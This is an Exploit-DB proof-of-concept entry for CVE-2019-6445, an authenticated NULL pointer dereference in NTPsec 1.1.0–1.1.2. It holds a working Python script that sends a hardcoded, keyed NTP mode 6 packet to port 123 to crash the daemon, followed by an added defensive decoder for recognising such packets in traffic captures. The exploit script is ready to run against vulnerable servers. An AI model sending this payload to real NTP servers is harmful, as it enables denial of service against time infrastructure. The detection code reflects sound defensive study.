NTPsec 1.1.2 – ‘ntp_control’ (Authenticated) NULL Pointer Dereference (PoC)

  • Author: Magnus Klaaborg Stubman
    Date: 2019-01-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46177/

#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-npe
# Vendor Homepage: https://ntpsec.org/
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
# CVE: CVE-2019-6445
# Note: this PoC uses Keyid 1 with password 'gurka'

import socket

# One NTP mode 6 (control) request: 12-byte header, the 4-byte variable
# data "leap", then the authentication trailer (keyid 1 followed by a
# 16-byte MAC). Written as a bytes literal so it runs under Python 2 and 3;
# the original str literal fails with TypeError on Python 3's sendto().
buf = (b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70"
       b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5"
       b"\x56\xc8\x07\xd4")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
sock.close()
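For defenders, a decoder for the mode 6 control packet the PoC sends, added here as example code that is not part of the original exploit: it parses the header, the variable data and the keyid/MAC trailer so that keyed control requests (the traffic class this advisory concerns) can be recognised in captures and alerted on when they come from hosts that should hold no control key. Field layout follows RFC 1305 Appendix B and ntpd's ntp_control.c; the accepted digest lengths are an assumption.

```python
import struct

# NTP mode 6 (control) header: byte 0 = LI(2) VN(3) MODE(3); byte 1 =
# R(1) E(1) M(1) OPCODE(5); then sequence, status, association id, offset
# and count as 16-bit big-endian fields (RFC 1305 App. B, ntp_control.c).
CTL_HEADER = struct.Struct(">BBHHHHH")
MODE_CONTROL = 6

# Sample input: the 36-byte datagram the PoC above sends, embedded here.
POC_PACKET = (b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70"
              b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5"
              b"\x56\xc8\x07\xd4")


def parse_control_packet(pkt):
    """Decode a mode 6 packet into a dict, or return None if it is not one."""
    if len(pkt) < CTL_HEADER.size:
        return None
    b0, b1, seq, status, assoc, offset, count = CTL_HEADER.unpack_from(pkt)
    if (b0 & 0x07) != MODE_CONTROL:
        return None
    data_start = CTL_HEADER.size
    data_end = data_start + count
    if data_end > len(pkt):
        return None  # count claims more variable data than the datagram holds
    info = {
        "version": (b0 >> 3) & 0x07, "opcode": b1 & 0x1F,
        "response": bool(b1 & 0x80), "error": bool(b1 & 0x40),
        "sequence": seq, "status": status, "association_id": assoc,
        "offset": offset, "count": count, "data": pkt[data_start:data_end],
        "keyid": None, "mac_len": 0,
    }
    # Variable data is padded to a 32-bit boundary before any auth trailer.
    trailer = data_end + (-count % 4)
    remaining = len(pkt) - trailer
    # A trailer of 4-byte keyid plus digest means a keyed request. Assumed
    # digest lengths: 16 (MD5), 20 (SHA-1) or 32 bytes.
    if remaining in (20, 24, 36):
        info["keyid"] = struct.unpack_from(">I", pkt, trailer)[0]
        info["mac_len"] = remaining - 4
    return info


def is_authenticated_control_request(pkt):
    """True for a keyed mode 6 request: the traffic class this advisory
    concerns, and worth alerting on from hosts that hold no control key."""
    info = parse_control_packet(pkt)
    return bool(info) and not info["response"] and info["keyid"] is not None
```

Run over the PoC datagram it reports version 2, opcode 3 (read variables), the 4-byte variable "leap", keyid 1 and a 16-byte MAC; an ordinary mode 3 client packet is ignored.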